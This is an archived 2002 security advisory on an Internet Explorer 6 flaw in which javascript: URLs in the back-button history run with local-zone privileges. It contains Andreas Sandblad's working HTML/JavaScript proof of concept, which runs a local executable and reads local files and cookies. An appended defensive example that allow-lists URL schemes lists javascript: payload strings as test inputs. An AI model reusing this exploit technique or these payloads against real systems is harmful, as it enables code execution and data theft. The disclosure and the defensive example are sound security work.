Internet Explorer back button can cause execution of script from history URLs



17th Apr 2002 [SBWID-5274]
COMMAND

	IE back button can cause execution of script from history URLs

SYSTEMS AFFECTED

	IE 6.0 at least

PROBLEM

	From Andreas Sandblad's [sandblad@acc.umu.se] post:
	

	IE allows URLs containing the javascript protocol in the history list.
	Code injected in the URL will operate in the same zone/domain as the
	last URL viewed. The javascript URL can be set to trigger when a user
	presses the back button.
	

	The normal behaviour when a page fails to load is to press the back
	button. The error page shown by IE is operating in the local computer
	zone (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000).
	Thus, we can execute code and read local files.
	

	

	EXPLOIT
	=======

	

	The exploit works as follows: press one of the links and then the back
	button.

	Note: The exploit has only been tested on fully patched IE 6.0 with
	Win XP and Win2000 Pro (assume other OSes are also vulnerable).
	Winmine.exe and test.txt must exist.
	

	--------------------------CUT HERE-------------------------------

	<html>
	<h1>Press link and then the backbutton to trigger script.</h1>
	<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
	Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
	<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
	Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
	<a href="javascript:readFile('file:///c:/test.txt')">
	Read c:\test.txt (needs to be created)</a><br>
	<a href="javascript:readCookie('http://www.google.com/')">
	Read Google cookie</a>

	<script>
	// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
	badUrl = "res:";
	function execFile(file){
	  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
	  s+= 'CODEBASE='+file+'></OBJECT>';
	  backBug(badUrl,s);
	}
	function readFile(file){
	  s = '<iframe name=i src='+file+' style=display:none onload=';
	  s+= 'alert(i.document.body.innerText)></iframe>';
	  backBug(badUrl,s);
	}
	function readCookie(url){
	  s = '<script>alert(document.cookie);close();<"+"/script>';
	  backBug(url,s);
	}
	function backBug(url,payload){
	  len = history.length;
	  page = document.location;
	  s = "javascript:if (history.length!="+len+") {";
	  s+= "open('javascript:document.write(\""+payload+"\")')";
	  s+= ";history.back();} else '<script>location=\""+url;
	  s+= "\";document.title=\""+page+"\";<"+"/script>';";
	  location = s;
	}
	</script>
	</html>

	--------------------------CUT HERE-------------------------------
	

	

	 

	                                                   _     _
	                                                 o' \,=./ `o
	                                                    (o o)
	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

SOLUTION

	None yet.
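	The defect is in the browser, so the advisory records no fix. The reusable
	lesson for application developers is the one the exploit's backBug function
	shows: a string assigned to location (or handed to open) is a navigation
	target, and a scheme other than http/https can carry code into the current
	zone. The block below is an added example, not part of Sandblad's post,
	showing how code that navigates on untrusted input can allow-list the URL
	scheme first. The names safeNavigationTarget, naiveIsJavascriptUrl,
	classifyTargets and the base origin https://app.example/ are constructed
	for this example; the sample inputs reuse the javascript: and res: strings
	from the exploit plus two obfuscated variants and two legitimate targets.

```javascript
// Added example (not from Sandblad's post): allow-list the URL scheme before
// assigning a string to location / window.open. All names are constructed.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// The prefix check many code bases use; included only to show what it misses
// (mixed case, leading whitespace, tab or newline inside the scheme).
function naiveIsJavascriptUrl(s) {
  return s.startsWith("javascript:");
}

// Returns the normalised absolute URL if navigating to it is allowed, else null.
// `base` stands in for the document's own origin (constructed value).
function safeNavigationTarget(untrusted, base = "https://app.example/") {
  if (typeof untrusted !== "string") return null;
  let parsed;
  try {
    // The WHATWG URL parser lowercases the scheme, trims surrounding whitespace
    // and removes embedded tabs/newlines, so " JavaScript:" and "java\tscript:"
    // both come out with protocol "javascript:" and fail the allow-list.
    parsed = new URL(untrusted, base);
  } catch (e) {
    return null; // unparsable input is not a navigation target
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Classify a batch of candidate targets, e.g. for a unit test or log review.
function classifyTargets(candidates) {
  return candidates.map((c) => ({
    input: c,
    naiveFlagged: naiveIsJavascriptUrl(c),
    allowed: safeNavigationTarget(c) !== null,
  }));
}

// Constructed sample inputs: the two schemes the exploit above relies on,
// two obfuscated variants, and two legitimate targets.
const SAMPLE_TARGETS = [
  "javascript:execFile('file:///c:/winnt/system32/winmine.exe')",
  "res:",
  " JavaScript:alert(document.cookie)",
  "java\tscript:alert(document.cookie)",
  "http://www.nonexistingdomain.se",
  "/account/settings",
];

for (const r of classifyTargets(SAMPLE_TARGETS)) {
  console.log(
    `${r.allowed ? "ALLOW" : "BLOCK"}  naiveFlagged=${r.naiveFlagged}  ${JSON.stringify(r.input)}`
  );
}
```

	Parsing first and comparing the resulting protocol against an allow-list is
	what makes the check robust: the two obfuscated variants slip past the
	prefix test but are normalised to "javascript:" by the parser and blocked,
	while relative paths resolve against the application's own origin and pass.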

